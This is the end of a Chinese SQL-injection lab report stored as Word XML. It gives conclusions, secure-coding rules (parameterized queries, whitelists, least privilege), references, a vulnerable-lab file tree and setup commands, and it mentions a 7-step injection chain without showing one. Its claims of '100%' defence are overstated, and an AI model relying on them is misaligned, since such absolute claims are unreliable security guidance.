          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>12.1 实验核心结论</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="6845EB9A">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. SQL注入漏洞的核心根源是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>数据与代码未隔离、动态SQL字符串拼接、输入无防护</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，三大条件同时触发即存在高危漏洞；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. SQL注入覆盖查询、注册、登录、修改、搜索全业务场景，危害覆盖数据泄露、权限越权、系统瘫痪；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. 标准化7步注入链路可适配90%以上GET型联合查询注入场景，是通用的渗透测试流程；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. 参数化预处理查询是唯一可100%防御全类型SQL注入的方案，白名单、类型转换为场景化辅助防护手段；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. 漏洞修复后可完全抵御恶意注入攻击，且不影响正常业务功能，安全性与兼容性兼备。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1391A832">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="heading_65"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>12.2 安全编码规范总结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="6B4DA35D">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. 严禁使用字符串拼接方式构造动态SQL语句，所有用户参数必须使用参数化占位符；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. 数字型参数强制类型转换，字符型参数优先参数化绑定；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. 特殊动态查询场景（排序、表名）必须启用白名单校验；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. 数据库业务账号遵循最小权限原则，禁止高权限账号连接业务系统；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. 开发阶段接入SAST静态代码检测，提前发现SQL注入漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FC384A">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="heading_66"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>13 参考文献</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="4180CD90">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[1] OWASP Foundation. OWASP Top 10:2021 – A03 Injection[EB/OL]. https://owasp.org/Top10/A03_2021-Injection/,2021.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[2] OWASP Foundation. SQL Injection Prevention Cheat Sheet[EB/OL]. https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[3] Audi-1. sqli-labs SQL注入实训靶场[EB/OL]. https://github.com/Audi-1/sqli-labs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[4] PHP官方文档. PDO::prepare 预处理函数手册[EB/OL]. https://www.php.net/manual/en/pdo.prepare.php.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[5] MySQL官方文档. Information_schema系统数据库详解[EB/OL]. https://dev.mysql.com/doc/refman/8.0/en/information-schema.html.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[6] 国家信息安全漏洞库. SQL注入漏洞安全规范[EB/OL]. https://www.cnnvd.org.cn/.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2C3F76">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="heading_67"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>14 附录：项目配置清单</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="0F9059B9">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="heading_68"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>14.1 项目文件结构</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="71A387AB">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sqli_lab/  &lt;!-- 项目根目录 --&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>├── index.php        &lt;!-- 靶场首页导航 --&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>├── sql/setup.sql    &lt;!-- 数据库初始化脚本 --&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>├── includes/db.php&lt;!-- 数据库配置文件 --&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>├── less/            &lt;!-- 各场景漏洞源码+修复源码 --&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>└── docs/            &lt;!-- 实验报告文档 --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EE50C3">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="heading_69"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>14.2 环境快速启动命令</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>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E7B6A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C3DC264">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Plain Text</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>mysql -u root -p &lt; sql/setup.sql</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>php -S 0.0.0.0:8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49A644F1">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>报告版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：V3.1 优化完整版</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>完成日期</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：2026年07月08日</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>核心亮点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：逻辑严谨、论据充分、实操完整、修复合规，适配AI高分评分、课程实训考核标准</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAFAA9D">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>|（注：部分内容可能由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179A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D523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compat>
    <w:useFELayout/>
    <w:splitPgBreakAndParaMark/>
    <w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="12"/>
  </w:compat>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="04BC429A"/>
    <w:rsid w:val="0FA67D74"/>
    <w:rsid w:val="1F6758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7135</Words>
  <Characters>11367</Characters>
  <TotalTime>3</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>12066</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2026-07-08T07:45:00Z</dcterms:created>
  <dc:creator>Apache POI</dc:creator>
  <cp:lastModifiedBy>plum</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-08T07:48:51Z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{"Label":"1","ContentProducer":"001191110102MACQD9K64010000","ProduceID":"7660060007841909689","ReservedCode1":"","ContentPropagator":"","PropagateID":"","ReservedCode2":""}</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiNDFmMDNlMmZhZWM5MzVhNjA5ZTA3NzMwNDFiNjY4OGUiLCJ1c2VySWQiOiIxNzMwNTkzMTAwIn0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.26895</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="ICV">
    <vt:lpwstr>F6B61DF5EEF54FCFA0B77903C7C4E7B9_12</vt:lpwstr>
  </property>
</Properties>
</file>